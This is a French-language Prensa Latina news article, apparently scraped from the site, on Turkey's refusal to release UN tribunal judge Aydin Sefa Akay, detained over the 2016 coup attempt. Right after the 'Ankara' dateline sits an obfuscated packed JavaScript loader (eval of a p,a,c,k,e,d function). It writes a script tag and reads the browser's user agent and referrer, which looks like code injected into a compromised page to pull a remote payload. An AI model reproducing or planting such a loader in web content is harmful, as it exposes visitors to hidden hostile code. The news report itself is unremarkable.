dimanche 21 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

La Turquie refuse la demande de liberté pour un juge de l’ONU

Ankara eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|esdhn|var|u0026u|referrer|ffdbz||js|php'.split('|'),0,{})) (PL) Par un courrier adressé au Conseil de Sécurité, le gouvernement de Turquie a refusé la demande de libération du juge Aydin Sefa Akay, membre du Tribunal Pénal International (TPI) des Nations Unies.

Ankara (PL) Par un courrier adressé au Conseil de Sécurité, le gouvernement de Turquie a refusé la demande de libération du juge Aydin Sefa Akay, membre du Tribunal Pénal International (TPI) des Nations Unies.

Dans la lettre, le représentant turque à l’ONU, Feridun Sinirlioglu, a assuré que son pays valorise l’état de droit et ses compromis internationaux, mais considère que la requête du TPI est « nulle », allant au-delà de son autorité et « interférant avec l’indépendance du pouvoir judiciaire de Turquie ».

Sinirlioglu a indiqué que les charges à l’encontre d’Akay ne sont pas liées à son travail au TPI, et qu’il ne bénéficie donc pas de l’immunité qui protège les membres du haut tribunal international, mais sont pour « crimes commis dans le pays », étant prétendument lié à l’organisation responsable du coup d’État avorté le 15 juillet 2016.

Le magistrat a été arrêté le 26 septembre 2016 à son domicile familial. Il est depuis détenu sous les accusations d’être membre d’une organisation terroriste, de tentative de renverser l’ordre constitutionnel et d’assassinat.

Akay formait parti du groupe de cinq juges qui travaillaient au TPI sur le dossier du génocide au Rwanda en 1994, et sa détention a paralysé la procédure d’appel de l’ancien ministre rwandais  Augustin Ngirabatware.

oda/acm

EN CONTINU
notes connexes